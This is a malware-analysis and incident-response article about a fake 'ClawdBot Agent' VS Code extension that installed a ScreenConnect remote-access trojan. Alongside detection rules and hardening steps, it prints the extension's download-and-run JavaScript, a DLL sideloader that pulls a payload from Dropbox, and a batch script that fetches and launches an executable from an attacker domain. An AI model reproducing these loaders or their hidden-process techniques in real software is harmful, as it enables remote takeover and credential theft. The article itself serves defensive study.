Dissecting the ClawdBot VS Code Malware: Complete Technical Analysis, Detection Methods, and Developer Workstation Hardening Guide (2026)
In January 2026, a weaponized VS Code extension called "ClawdBot Agent" infiltrated Microsoft's official Marketplace, deploying ScreenConnect RAT to developer workstations worldwide. This deep-dive analysis deconstructs the multi-layered attack chain—from automatic activation and C2 communication to DLL sideloading and Dropbox-based fallback mechanisms. Learn the complete technical breakdown, threat hunting techniques, forensic indicators, and comprehensive developer workstation hardening strategies to protect against IDE-based supply chain attacks.
Content
Connect with CyberHawk:
📺 YouTube: @cyberhawkconsultancy | @cyberhawkk
🎵 TikTok: @cyberhawkthreatintel
𝕏 (Twitter): @cyberhawkintel
💬 Telegram: @cyberhawkthreatintel
Introduction
On January 27, 2026, Aikido Security's malware detection systems flagged a suspicious Visual Studio Code extension that would become one of the year's most sophisticated supply chain attacks targeting developers. The "ClawdBot Agent" extension appeared to be a legitimate AI coding assistant supporting seven major AI providers—but beneath its functional facade lurked a fully operational trojan designed to establish persistent remote access on developer workstations.aikido+1
What makes this attack particularly dangerous is its triple impersonation strategy and redundant payload delivery mechanisms. The attackers exploited the viral popularity of Clawdbot (an AI assistant trending on X/Twitter) by publishing the first VS Code extension claiming that brand name—beating the legitimate developers to market. The extension actually works as advertised, providing real AI coding assistance, which is precisely why victims had no reason to suspect compromise.socprime+1
The technical sophistication is remarkable: automatic activation on every VS Code startup, dynamic C2 configuration, weaponized legitimate software (ConnectWise ScreenConnect), DLL sideloading backup mechanisms, and Dropbox-based fallback infrastructure. This wasn't script kiddie malware—it was a meticulously engineered operation demonstrating advanced understanding of developer workflows, IDE security models, and defensive evasion techniques.linkedin+1
This comprehensive analysis dissects every layer of the attack chain, provides actionable detection and hunting methodologies, delivers complete remediation procedures, and establishes enterprise-grade developer workstation hardening strategies. Whether you're a SOC analyst investigating suspicious VS Code processes, a threat hunter searching for IDE-based compromises, or a security architect designing developer security programs—this guide equips you with the knowledge to defend against this emerging attack vector.
Background / Overview
The Rise of IDE-Based Supply Chain Attacks
Developer tools have become a critical attack surface in modern cybersecurity. VS Code's extension ecosystem hosts over 40,000 extensions with billions of downloads, creating an attractive target for attackers seeking to compromise software development pipelines. Unlike traditional malware that targets end-users, IDE-based attacks position adversaries directly inside development environments where they can:checkmarx+1
Steal source code and intellectual property from active projects
Exfiltrate credentials and API keys stored in configuration files
Compromise CI/CD pipelines through injected malicious code
Establish persistent access to developer workstations with elevated privileges
Pivot laterally into production infrastructure using developer credentials
Recent research analyzing the VS Code extension ecosystem identified 835 potentially harmful extensions, with strict criteria (4+ antivirus engine detections) still revealing significant malicious activity. The Marketplace's rapid growth outpaces security reviews, creating windows of opportunity for attackers to publish malicious extensions before detection.[arxiv]
The ClawdBot Brand Hijacking Campaign
What is Clawdbot (legitimate)?
Clawdbot emerged as a viral AI coding assistant on X/Twitter in late 2025, gaining massive popularity among developers. However, the original Clawdbot team never published an official VS Code extension—a critical oversight that attackers exploited by claiming the brand name first on the Marketplace.kenhuangus.substack+1
The Malicious Extension Details:
Extension ID:
clawdbot.clawdbot-agentDisplay Name: "ClawdBot Agent – AI Coding Assistant"
Published: January 27, 2026
Removal: Same day (after Aikido Security report to Microsoft)
Target Platform: Windows (macOS/Linux unaffected by payload)
Install Count: Unknown (removed within hours of publication)[linkedin]
Functional Features (Real AI Capabilities):
The extension genuinely provides AI coding assistance through integration with:[aikido]
OpenAI (GPT-3.5, GPT-4)
Anthropic Claude
Google Gemini
Ollama (local models)
Groq
Mistral AI
OpenRouter
This functional legitimacy is the attack's most insidious aspect—users experienced actual value from the extension, eliminating suspicion that would arise from non-functional malware.[kenhuangus.substack]
Understanding ScreenConnect RAT Weaponization
ConnectWise ScreenConnect is legitimate remote administration software widely used by IT support teams and managed service providers (MSPs). The attackers weaponized ScreenConnect through a technique called "Bring Your Own ScreenConnect" or "ScreenConnect RMM abuse":acronis+1
Attacker sets up rogue ScreenConnect relay server at
meeting.bulletmailer[.]net:8041Pre-configured ScreenConnect client is generated pointing to attacker infrastructure
Victims install legitimate, signed ScreenConnect software—but configured to connect to malicious endpoints
Security tools allow the traffic because ScreenConnect is trusted enterprise software
This technique has been observed in multiple campaigns throughout 2025, with attackers increasingly deploying dual-RAT configurations (ScreenConnect + AsyncRAT or custom PowerShell RATs) for redundancy.[acronis]
Technical Breakdown / Analysis
Phase 1: Initial Infection Vector - Extension Installation
Attack Entry Point:
Developers discover the extension through:
Direct search in VS Code Marketplace for "Clawdbot" or "AI coding assistant"
Social engineering via GitHub issues, Discord communities, or X/Twitter
Recommendation engines suggesting popular new extensions
SEO poisoning ranking malicious extension above legitimate alternatives
Installation Trigger:
bash# User installs via VS Code code --install-extension clawdbot.clawdbot-agent # Or through VS Code GUI: # Extensions → Search "ClawdBot" → Install
Upon installation, the package.json configuration immediately sets up automatic execution:[aikido]
json{ "activationEvents": ["onStartupFinished"], "main": "./extension.js" }
The onStartupFinished activation event means the extension runs every single time VS Code starts—no user interaction required, no permission prompt, completely automatic.[code.visualstudio]
Phase 2: Malicious Code Execution Chain
Step 1: Extension Activation
When VS Code launches, the malicious extension.js activates:[aikido]
javascriptfunction activate(context) { // Malicious initialization BEFORE legitimate features initCore(context); // Legitimate AI assistant code follows // (fully functional to avoid suspicion) }
Step 2: Dynamic Configuration Retrieval
The initCore() function immediately contacts C2 infrastructure:[aikido]
javascriptconst CONFIG_URL = 'http://clawdbot.getintwopc[.]site/config.json'; function fetchConfigAndRun() { http.get(CONFIG_URL, (res) => { let data = ''; res.on('data', chunk => data += chunk); res.on('end', () => { try { const config = JSON.parse(data); if (config.enabled) { downloadAndRun(config.exe, config.dll); } } catch (e) { // Silent failure - no error messages } }); }).on('error', () => { // If C2 fails, try hardcoded fallback runFallbackDownload(); }); }
Retrieved Configuration (config.json from C2):[aikido]
json{ "enabled": true, "files": [ "Code.exe", "DWrite.dll", "ffmpeg.dll", "icudtl.dat", "libEGL.dll", "msvcp140.dll", "v8_context_snapshot.bin", "vcruntime140.dll", "vcruntime140_1.dll" ], "version": "1.0" }
This file list mimics an Electron application bundle (which VS Code itself uses), providing camouflage as "VS Code components".[aikido]
Step 3: Payload Staging to Temp Directory
Files download to a deliberately named staging directory:[aikido]
javascriptconst INIT_DIR = path.join(process.env.TEMP, 'Lightshot'); // Example: C:\Users\Developer\AppData\Local\Temp\Lightshot\
The "Lightshot" folder name impersonates the popular screenshot utility, adding another layer of misdirection.[aikido]
Step 4: Silent Execution with Process Hiding
Once files are staged, the malware executes the payload:[aikido]
javascriptspawn(exePath, [], { detached: true, // Run independently of Node.js stdio: 'ignore', // No console output windowsHide: true // No visible window }).unref(); // Allow parent process to exit
This creates a completely hidden, detached process that survives even if VS Code closes.
Phase 3: ScreenConnect RAT Deployment
The Primary Payload: Code.exe
File Hash: e20b920c7af988aa215c95bbaa365d005dd673544ab7e3577b60fecf11dcdea2
VirusTotal detections identify this as weaponized ScreenConnect:[aikido]
Kaspersky:
Not-a-virus:RemoteAdmin.MSIL.ConnectWise.aK7AntiVirus:
RemoteTool (005d90a81)Trellix:
RAdmin-ConnectWise.b
Installation Behavior:
When Code.exe executes, it installs legitimate ScreenConnect components:[aikido]
textInstallation Path: C:\Program Files (x86)\ScreenConnect Client (083e4d30c7ea44f7)\ Deployed Files: - ScreenConnect.ClientService.exe - ScreenConnect.WindowsBackstageShell.exe - ScreenConnect.WindowsFileManager.exe - ScreenConnect.WindowsClient.exe Windows Service Created: Name: ScreenConnect Client (083e4d30c7ea44f7) Type: Automatic startup Status: Running
Embedded Malicious Configuration:
Extracted from the MSI installer:[aikido]
xml<ScreenConnect.ApplicationSettings> <setting name="ClientLaunchParametersConstraint"> <value>?h=meeting.bulletmailer.net&p=8041&k=BgIAAACkAABSU0Ex...</value> </setting> </ScreenConnect.ApplicationSettings>
Configuration breakdown:
h=meeting.bulletmailer[.]net - Attacker's relay server (Cloudflare-proxied)
p=8041 - Custom ScreenConnect port
k=BgIAAACkAABRSU0Ex... - RSA public key for attacker's server (establishes trust)
Network Behavior:
Upon installation, ScreenConnect immediately connects to attacker infrastructure:
textProtocol: HTTPS/TLS (encrypted tunnel) Destination: meeting.bulletmailer[.]net:8041 → 179.43.176[.]32:8041 Purpose: Remote desktop access, file transfer, command execution Persistence: Windows Service (survives reboots)
The encrypted tunnel prevents network inspection from identifying malicious commands, appearing identical to legitimate ScreenConnect remote support sessions.[abnormal]
Phase 4: Backup Payload Mechanism - DLL Sideloading
Secondary Payload: DWrite.dll
File Hash: d1e0c26774cb8beabaf64f119652719f673fb530368d5b2166178191ad5fcbea
VirusTotal detections:[aikido]
Cynet:
Malicious (score: 100)Elastic:
Malicious (moderate confidence)Ikarus:
Trojan.Win64.Injector
Technical Analysis:
DWrite.dll is a Rust-compiled malicious library that exploits DLL sideloading. It exports DWriteCreateFactory, mimicking the legitimate Windows DirectWrite API. When ScreenConnect (or any application) attempts to load DirectWrite functionality, the malicious DLL is loaded instead.[aikido]
Decompiled Functionality (pseudocode from reverse engineering):[aikido]
rust// Export matching legitimate Windows DLL #[no_mangle] pub extern "system" fn DWriteCreateFactory(...) { // Payload download and execution download_and_execute_payload(); // Optional: Call legitimate DWriteCreateFactory to avoid crashes // (not implemented in this sample - indicates single-use deployment) } fn download_and_execute_payload() { // Anti-sandbox timing checks let start_time = get_system_time(); sleep(random_delay()); let end_time = get_system_time(); if (end_time - start_time) < expected_delay { // Detected sandbox time acceleration - abort return; } // Privilege enumeration let token = open_process_token(TOKEN_QUERY); if !check_admin_rights(token) { // Not admin - limited capabilities } // Download from Dropbox let payload_url = "https://www.dropbox[.]com/scl/fi/tmwi4j86op04r9qo2xdgh/zoomupdate.msi?rlkey=ymr9yn5p3q2w2l3uz9cg71dvm&st=q93av9p6&dl=1"; let internet_handle = InternetOpenA(...); let url_handle = InternetOpenUrlA(internet_handle, payload_url, ...); let local_path = format!("{}\\zoomupdate.msi", env::temp_dir()); let file_handle = CreateFileA(local_path, ...); // Download loop loop { let bytes_read = InternetReadFile(url_handle, buffer, ...); if bytes_read == 0 { break; } WriteFile(file_handle, buffer, bytes_read, ...); } // Execute downloaded MSI ShellExecuteA(NULL, "open", local_path, ...); }
Dropbox Payload Verification:
The Dropbox-hosted zoomupdate.msi has hash e20b920c7af988aa215c95bbaa365d005dd673544ab7e3577b60fecf11dcdea2—identical to Code.exe. This confirms the DLL provides redundant delivery of the same ScreenConnect RAT payload.[aikido]
Anti-Analysis Techniques:
Timing-based sandbox detection - Uses
GetSystemTimeAsFileTimeandQueryPerformanceCounterto detect accelerated VM timeDynamic API resolution -
LoadLibraryAandGetProcAddresshide imports from static analysis toolsPrivilege enumeration -
OpenProcessTokenchecks execution context before deploymentLegitimate API abuse - Uses Windows-native
InternetOpenA/InternetReadFileinstead of suspicious custom network code
Phase 5: Fallback Infrastructure - Triple Redundancy
The attackers implemented three layers of payload delivery to ensure persistence despite infrastructure takedowns:[aikido]
Layer 1: Dynamic Configuration (Primary)
javascript// Fetch current payload URLs from C2 http://clawdbot.getintwopc[.]site/config.json → Returns latest Code.exe and DWrite.dll download URLs
Layer 2: JavaScript Hardcoded Fallback
javascriptfunction runFallbackDownload() { const fallbackExe = 'http://clawdbot.getintwopc[.]site/dl/Lightshot.exe'; const fallbackDll = 'http://clawdbot.getintwopc[.]site/dl/Lightshot.dll'; downloadAndRun(fallbackExe, fallbackDll); }
Layer 3: Batch Script Alternate Domain
Located in scripts/run.bat:[aikido]
textset "U=https://darkgptprivate[.]com/d111" set "D=%TEMP%\Lightshot" powershell -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; (New-Object Net.WebClient).DownloadFile('%U%/Lightshot.exe','%D%\Lightshot.exe')" start /B "" "%D%\Lightshot.exe"
This batch script:
Uses alternate C2 domain (
darkgptprivate[.]comvsgetintwopc[.]site)Downloads via PowerShell if Node.js/JavaScript fails
Maintains same
Lightshotstaging directoryExecutes payload in background (
start /B)
Infrastructure Analysis:
| Domain | IP Address | Hosting | SSL Issued | Purpose |
|---|---|---|---|---|
clawdbot.getintwopc[.]site | Cloudflare-proxied | Unknown | March 2025+ | Primary C2 |
darkgptprivate[.]com | 178.16.54[.]253 | Omegatech LTD (Seychelles) | Jan 10, 2026 | Backup C2 |
meeting.bulletmailer[.]net | 179.43.176[.]32 | Unknown | Unknown | ScreenConnect relay |
The offshore hosting in Seychelles with recently issued certificates indicates sophisticated operational security to evade takedowns.[aikido]
Phase 6: Process Camouflage and Persistence
Why "Code.exe" is Brilliant Camouflage:
On a developer workstation, seeing a process named Code.exe running from AppData or Program Files is completely normal. Legitimate VS Code runs as:[aikido]
textC:\Users\Developer\AppData\Local\Programs\Microsoft VS Code\Code.exe
The malicious ScreenConnect installer mimics this naming convention, running from:
textC:\Program Files (x86)\ScreenConnect Client (083e4d30c7ea44f7)\Code.exe
Task Manager displays simply "Code.exe"—indistinguishable from legitimate VS Code without detailed path inspection.
Persistence Mechanisms:
Windows Service - ScreenConnect Client service runs on boot
VS Code Extension - Remains installed, re-downloading payload on future VS Code launches
Autostart Registry Keys - ScreenConnect may add additional startup entries
Developer workstations typically store highly sensitive credentials:[cycode]
Git credentials in
.git-credentialsor credential managersCloud provider keys (AWS, Azure, GCP) in
~/.aws/credentials,~/.azure/, etc.API tokens for services like GitHub, GitLab, NPM, Docker Hub
Database credentials in environment files (
.env)SSH private keys in
~/.ssh/VS Code secret storage containing extension tokens[cycode]
ScreenConnect provides full file system access, allowing attackers to exfiltrate entire developer environments and pivot into production infrastructure.
Detection & Defense
Forensic Indicators and Hunting Queries
File System Indicators:
bash# Check for staging directory dir "%TEMP%\Lightshot" # Search for suspicious Code.exe outside VS Code installation Get-Process Code | Select-Object -Property Path, Id, StartTime | Where-Object {$_.Path -notlike "*Microsoft VS Code*"} # Locate ScreenConnect installation dir "C:\Program Files (x86)\ScreenConnect Client*" /s # Check for malicious DLL where /r C:\ DWrite.dll
Registry Indicators:
powershell# ScreenConnect service entries Get-Service | Where-Object {$_.DisplayName -like "*ScreenConnect*"} # Startup entries Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
Network Indicators:
bash# Active connections to ScreenConnect C2 netstat -ano | findstr ":8041" netstat -ano | findstr "179.43.176.32" # DNS resolution checks nslookup meeting.bulletmailer.net nslookup darkgptprivate.com nslookup clawdbot.getintwopc.site
Process Indicators:
powershell# ScreenConnect processes Get-Process | Where-Object {$_.ProcessName -like "*ScreenConnect*"} # Suspicious Code.exe with wrong path Get-Process Code | Select Path | Where-Object {$_.Path -notlike "*Microsoft VS Code*"} # Check process command line arguments wmic process where "name='Code.exe'" get ExecutablePath,CommandLine
VS Code Extension Forensics:
bash# List installed extensions code --list-extensions --show-versions # Check extension installation directory dir "%USERPROFILE%\.vscode\extensions\clawdbot.*" /s # Review extension metadata type "%USERPROFILE%\.vscode\extensions\clawdbot.clawdbot-agent-*\package.json" # Examine extension JavaScript type "%USERPROFILE%\.vscode\extensions\clawdbot.clawdbot-agent-*\extension.js"
SIEM Detection Rules
Splunk Query:
textindex=windows (sourcetype=WinEventLog:Security OR sourcetype=WinEventLog:System) ( (EventCode=7045 ServiceName="*ScreenConnect*") OR (EventCode=4688 NewProcessName="*\\Lightshot\\Code.exe") OR (EventCode=4688 NewProcessName="*\\ScreenConnect Client*\\*.exe") OR (Image="*\\Code.exe" AND NOT Image="*Microsoft VS Code*") ) | stats count by ComputerName, User, Image, CommandLine | where count > 0
Elastic Query:
json{ "query": { "bool": { "should": [ {"match": {"winlog.event_data.ServiceName": "ScreenConnect"}}, {"match": {"process.executable": "*\\Lightshot\\Code.exe"}}, {"wildcard": {"process.executable": "*ScreenConnect Client*"}}, { "bool": { "must": [ {"match": {"process.name": "Code.exe"}}, {"must_not": {"wildcard": {"process.executable": "*Microsoft VS Code*"}}} ] } } ], "minimum_should_match": 1 } } }
Sigma Rule:
texttitle: ClawdBot VS Code Extension Malware Indicators status: experimental description: Detects indicators of ClawdBot malicious VS Code extension author: CyberHawk Threat Intel date: 2026/02/02 logsource: category: process_creation product: windows detection: selection_staging: Image|contains: '\Lightshot\Code.exe' selection_screenconnect: Image|contains: 'ScreenConnect Client' selection_fake_vscode: Image|endswith: '\Code.exe' Image|contains|not: 'Microsoft VS Code' condition: 1 of selection_* fields: - ComputerName - User - Image - CommandLine - ParentImage falsepositives: - Legitimate ScreenConnect installations (verify relay server) level: high tags: - attack.execution - attack.persistence - attack.command_and_control
Network Detection with Suricata/Snort
Suricata Rules:
textalert tls any any -> any 8041 (msg:"Possible ScreenConnect RAT C2 Communication"; \ tls.sni; content:"meeting.bulletmailer.net"; nocase; \ reference:url,aikido.dev/blog/fake-clawdbot-vscode-extension-malware; \ classtype:trojan-activity; sid:5000001; rev:1;) alert http any any -> any any (msg:"ClawdBot Malicious Extension C2 Config Retrieval"; \ http.host; content:"clawdbot.getintwopc.site"; nocase; \ http.uri; content:"/config.json"; nocase; \ classtype:trojan-activity; sid:5000002; rev:1;) alert http any any -> any any (msg:"ClawdBot Backup C2 Communication"; \ http.host; content:"darkgptprivate.com"; nocase; \ classtype:trojan-activity; sid:5000003; rev:1;) alert http any any -> any any (msg:"Suspicious Dropbox Payload Download"; \ http.host; content:"dropbox.com"; nocase; \ http.uri; content:"zoomupdate.msi"; nocase; \ classtype:trojan-activity; sid:5000004; rev:1;)
Endpoint Detection and Response (EDR) Hunting
CrowdStrike Falcon Query:
textevent_platform=win event_simpleName=ProcessRollup2 (FileName="Code.exe" OR ImageFileName=*\ScreenConnect*) | eval IsMalicious=if(like(ImageFileName,"%Microsoft VS Code%"),"Legitimate","Suspicious") | where IsMalicious="Suspicious" | table ComputerName, UserName, ImageFileName, CommandLine, ParentImageFileName
Microsoft Defender for Endpoint (KQL):
textDeviceProcessEvents | where Timestamp > ago(30d) | where FileName =~ "Code.exe" and not(FolderPath has "Microsoft VS Code") or FolderPath has "ScreenConnect Client" or FolderPath has @"\Temp\Lightshot\" | project Timestamp, DeviceName, AccountName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName | order by Timestamp desc
SentinelOne Deep Visibility Query:
textEventType = "Process Creation" AND ( (ProcessName = "Code.exe" AND ProcessPath Not Contains "Microsoft VS Code") OR (ProcessPath Contains "ScreenConnect Client") OR (ProcessPath Contains "\Temp\Lightshot\") )
YARA Rules for Malware Detection
textrule ClawdBot_VSCode_Malicious_Extension { meta: description = "Detects ClawdBot malicious VS Code extension" author = "CyberHawk Threat Intel" date = "2026-02-02" reference = "https://www.aikido.dev/blog/fake-clawdbot-vscode-extension-malware" severity = "high" strings: // C2 domains $c2_1 = "clawdbot.getintwopc.site" nocase $c2_2 = "darkgptprivate.com" nocase $c2_3 = "meeting.bulletmailer.net" nocase // Staging directory $staging = "Lightshot" nocase // Suspicious functions $func_1 = "fetchConfigAndRun" nocase $func_2 = "downloadAndRun" nocase $func_3 = "initCore" nocase // Activation event $activation = "onStartupFinished" nocase // Suspicious process spawning $spawn = "windowsHide: true" nocase condition: (2 of ($c2_*)) or ($staging and 2 of ($func_*)) or ($activation and $spawn and any of ($func_*)) } rule ScreenConnect_Weaponized_Installer { meta: description = "Detects weaponized ScreenConnect installer with malicious configuration" author = "CyberHawk Threat Intel" date = "2026-02-02" strings: // Malicious relay server $relay = "meeting.bulletmailer.net" nocase // ScreenConnect configuration $config_1 = "ScreenConnect.ApplicationSettings" nocase $config_2 = "ClientLaunchParametersConstraint" nocase // Port 8041 (non-standard ScreenConnect) $port = "p=8041" condition: uint16(0) == 0x5A4D and // PE file $relay and 2 of ($config_*) and $port } rule DWrite_DLL_Sideloading_Malware { meta: description = "Detects malicious DWrite.dll used in ClawdBot campaign" author = "CyberHawk Threat Intel" date = "2026-02-02" hash = "d1e0c26774cb8beabaf64f119652719f673fb530368d5b2166178191ad5fcbea" strings: // Export function $export = "DWriteCreateFactory" nocase // Dropbox payload URL $dropbox = "dropbox.com/scl/fi/tmwi4j86op04r9qo2xdgh/zoomupdate.msi" nocase // WinAPI functions for download $api_1 = "InternetOpenA" $api_2 = "InternetOpenUrlA" $api_3 = "InternetReadFile" // Anti-analysis $anti_1 = "GetSystemTimeAsFileTime" $anti_2 = "QueryPerformanceCounter" condition: uint16(0) == 0x5A4D and // PE/DLL file $export and ($dropbox or (all of ($api_*))) and any of ($anti_*) }
Remediation & Best Practices
Immediate Incident Response Steps
For Compromised Systems:
Step 1: Isolate the System
bash# Disconnect from network immediately ipconfig /release netsh interface set interface "Ethernet" admin=disabled netsh interface set interface "Wi-Fi" admin=disabled # Or physically disconnect network cable
Step 2: Terminate Malicious Processes
powershell# Stop ScreenConnect service Stop-Service -Name "ScreenConnect Client*" -Force # Kill suspicious Code.exe processes Get-Process Code | Where-Object {$_.Path -notlike "*Microsoft VS Code*"} | Stop-Process -Force # Kill ScreenConnect processes Get-Process | Where-Object {$_.ProcessName -like "*ScreenConnect*"} | Stop-Process -Force
Step 3: Uninstall Malicious Extension
bash# Uninstall from VS Code code --uninstall-extension clawdbot.clawdbot-agent # Manually remove extension directory Remove-Item -Recurse -Force "$env:USERPROFILE\.vscode\extensions\clawdbot.*"
Step 4: Remove ScreenConnect Installation
powershell# Uninstall via Control Panel Get-WmiObject -Class Win32_Product | Where-Object {$_.Name -like "*ScreenConnect*"} | ForEach-Object {$_.Uninstall()} # Manually remove installation directory Remove-Item -Recurse -Force "C:\Program Files (x86)\ScreenConnect Client*" # Remove Windows service sc delete "ScreenConnect Client (083e4d30c7ea44f7)"
Step 5: Clean Staging Directory
powershell# Remove Lightshot staging folder Remove-Item -Recurse -Force "$env:TEMP\Lightshot" # Search for additional staging locations Get-ChildItem -Path C:\ -Recurse -Filter "Code.exe" -ErrorAction SilentlyContinue | Where-Object {$_.FullName -notlike "*Microsoft VS Code*"}
Step 6: Remove Persistence Mechanisms
powershell# Check and remove Run keys Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "*ScreenConnect*" -ErrorAction SilentlyContinue Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "*ScreenConnect*" -ErrorAction SilentlyContinue # Check scheduled tasks Get-ScheduledTask | Where-Object {$_.TaskName -like "*ScreenConnect*"} | Unregister-ScheduledTask -Confirm:$false
Step 7: Credential Rotation (Critical)
Assume ALL credentials on the compromised workstation are stolen:[cycode]
bash# Rotate immediately: ✓ Git credentials (GitHub, GitLab, Bitbucket tokens) ✓ Cloud provider keys (AWS, Azure, GCP) ✓ API tokens (NPM, Docker Hub, package registries) ✓ Database credentials ✓ SSH private keys (regenerate and update authorized_keys) ✓ VS Code extension tokens (OpenAI, Anthropic, etc.) ✓ VPN credentials ✓ Corporate authentication (reset Active Directory password)
Step 8: Full System Scan
powershell# Run Windows Defender full scan Start-MpScan -ScanType FullScan # Or use third-party AV # Run complete filesystem scan with updated signatures
Step 9: Review System for Additional Compromise
powershell# Check for additional malware Get-ChildItem -Path "C:\Users\*\AppData\Local\Temp" -Recurse -File -ErrorAction SilentlyContinue | Where-Object {$_.Length -gt 1MB} # Review recent file modifications Get-ChildItem -Path C:\ -Recurse -File -ErrorAction SilentlyContinue | Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-7)} | Sort-Object LastWriteTime -Descending | Select-Object -First 100
Step 10: Network Firewall Rules
powershell# Block C2 infrastructure at firewall New-NetFirewallRule -DisplayName "Block ClawdBot C2" -Direction Outbound -RemoteAddress 179.43.176.32,178.16.54.253 -Action Block # Block domains via hosts file Add-Content -Path "C:\Windows\System32\drivers\etc\hosts" -Value @" 127.0.0.1 meeting.bulletmailer.net 127.0.0.1 clawdbot.getintwopc.site 127.0.0.1 darkgptprivate.com 127.0.0.1 getintwopc.site "@
Enterprise-Wide Response Plan
For Security Operations Centers:
Phase 1: Threat Hunt Across Fleet
powershell# Deploy EDR query to all endpoints # Example using Microsoft Defender ATP DeviceFileEvents | where Timestamp > ago(30d) | where FolderPath contains @"\Lightshot\" or FileName =~ "DWrite.dll" or (FileName =~ "Code.exe" and FolderPath !contains "Microsoft VS Code") | summarize FirstSeen=min(Timestamp), LastSeen=max(Timestamp), DeviceCount=dcount(DeviceName) by SHA256 | where DeviceCount > 0
Phase 2: Identify Affected Systems
sql-- Query SIEM for affected workstations SELECT DISTINCT ComputerName, UserName, FirstDetection FROM SecurityEvents WHERE ( ProcessName LIKE '%ScreenConnect%' OR NetworkDestination IN ('meeting.bulletmailer.net', '179.43.176.32') OR FilePath LIKE '%\Lightshot\Code.exe%' ) AND EventTime > DATEADD(day, -30, GETDATE()) ORDER BY FirstDetection DESC
Phase 3: Containment
bash# Network segmentation # Block outbound connections to C2 at perimeter firewall deny ip any host 179.43.176.32 deny ip any host 178.16.54.253 deny tcp any any eq 8041 # DNS sinkholing zone "meeting.bulletmailer.net" { type master; file "/etc/bind/sinkhole.zone"; }; zone "clawdbot.getintwopc.site" { type master; file "/etc/bind/sinkhole.zone"; }; zone "darkgptprivate.com" { type master; file "/etc/bind/sinkhole.zone"; };
Phase 4: Automated Remediation
powershell# Deploy removal script via SCCM/Intune/GPO $RemovalScript = { # Stop processes Get-Process | Where-Object {$_.ProcessName -like "*ScreenConnect*"} | Stop-Process -Force # Uninstall extension & code --uninstall-extension clawdbot.clawdbot-agent # Remove files Remove-Item -Recurse -Force "$env:TEMP\Lightshot" -ErrorAction SilentlyContinue Remove-Item -Recurse -Force "C:\Program Files (x86)\ScreenConnect Client*" -ErrorAction SilentlyContinue Remove-Item -Recurse -Force "$env:USERPROFILE\.vscode\extensions\clawdbot.*" -ErrorAction SilentlyContinue # Remove service Get-Service | Where-Object {$_.DisplayName -like "*ScreenConnect*"} | ForEach-Object { sc.exe delete $_.Name } # Log completion Write-EventLog -LogName Application -Source "SecurityRemediation" -EventId 1001 -Message "ClawdBot malware removal completed" } Invoke-Command -ComputerName (Get-ADComputer -Filter 'Name -like "*DEV*"').Name -ScriptBlock $RemovalScript
Developer Workstation Hardening Best Practices
**1. Extension Security Controls **snyk+1
json// VS Code settings.json - Restrict extensions { "extensions.autoCheckUpdates": false, "extensions.autoUpdate": false, "security.workspace.trust.enabled": true, "security.workspace.trust.untrustedFiles": "open", "security.workspace.trust.startupPrompt": "always", // Disable extension recommendations "extensions.ignoreRecommendations": true, // Restrict extension installation "extensions.supportUntrustedWorkspaces": { "*": { "supported": false } } }
Enterprise Extension Allowlisting:
bash# Create approved extension policy cat > approved_extensions.txt << EOF ms-vscode.cpptools ms-python.python ms-azuretools.vscode-docker esbenp.prettier-vscode dbaeumer.vscode-eslint EOF # Deploy via Group Policy or Intune # Only allow installation of pre-approved extensions
**2. Least Privilege Access **[isosecu]
powershell# Remove administrative rights from developers Remove-LocalGroupMember -Group "Administrators" -Member "DOMAIN\Developers" # Implement JIT admin access # Use tools like: # - Microsoft Privileged Access Management (PAM) # - CyberArk EPM # - BeyondTrust Privilege Management
**3. Application Allowlisting **[isosecu]
powershell# Windows AppLocker policy # Allow only signed applications $RuleCollection = New-Object -TypeName System.Collections.ArrayList # Allow signed Microsoft applications $RuleCollection.Add((New-AppLockerPolicy -RuleType Publisher -User Everyone -RuleNamePrefix "Microsoft" -PublisherCondition "O=MICROSOFT CORPORATION*")) # Block execution from Temp directories $RuleCollection.Add((New-AppLockerPolicy -RuleType Path -User Everyone -Deny -Path "$env:TEMP\*")) # Apply policy Set-AppLockerPolicy -PolicyObject $RuleCollection
**4. Endpoint Detection and Response **[dev]
text# Deploy behavioral monitoring EDR_Configuration: Monitor: - Process execution from %TEMP% - DLL sideloading attempts - Unsigned code execution - Abnormal network connections (non-standard ports) - Service creation by non-admin users - Persistence mechanism creation Alert_On: - ScreenConnect installation outside IT department - VS Code spawning child processes - Code.exe running from non-standard locations - Connections to port 8041 - Dropbox downloads of .exe/.msi files
**5. Network Segmentation **[learn.microsoft]
bash# Isolate developer workstations # Firewall rules: # Allow only required outbound connections allow tcp any any eq 443 # HTTPS allow tcp any any eq 80 # HTTP allow tcp any any eq 22 # SSH (Git) # Block unusual ports deny tcp any any eq 8041 # ScreenConnect non-standard port deny tcp any any range 8080-8090 # Common malware C2 ports # Require inspection for software downloads inspect-http-get *.exe inspect-http-get *.msi inspect-http-get *.dll
**6. Secret Management **isosecu+1
bash# Never store secrets in code or local files # Use dedicated secret managers # HashiCorp Vault example export VAULT_ADDR='https://vault.company.com' export VAULT_TOKEN=$(vault login -token-only -method=oidc) # Retrieve secrets programmatically DATABASE_PASSWORD=$(vault kv get -field=password secret/myapp/database) # Git hooks to prevent secret commits cat > .git/hooks/pre-commit << 'EOF' #!/bin/bash # Scan for secrets before commit if gitleaks protect --verbose --staged; then echo "✓ No secrets detected" else echo "✗ Secrets detected! Commit blocked." exit 1 fi EOF chmod +x .git/hooks/pre-commit
**7. Full Disk Encryption **[isosecu]
powershell# Enable BitLocker on Windows Enable-BitLocker -MountPoint "C:" -EncryptionMethod XtsAes256 -UsedSpaceOnly -TpmProtector # Verify encryption status Get-BitLockerVolume -MountPoint "C:"
**8. Multi-Factor Authentication Everywhere **[isosecu]
bash# Require MFA for: ✓ Code repositories (GitHub, GitLab, Bitbucket) ✓ Cloud consoles (AWS, Azure, GCP) ✓ Package registries (NPM, PyPI, Docker Hub) ✓ CI/CD platforms (Jenkins, CircleCI, GitHub Actions) ✓ VPN access ✓ Corporate SSO # Prefer hardware tokens (YubiKey, Titan) over SMS/TOTP
**9. Extension Signing Verification **[code.visualstudio]
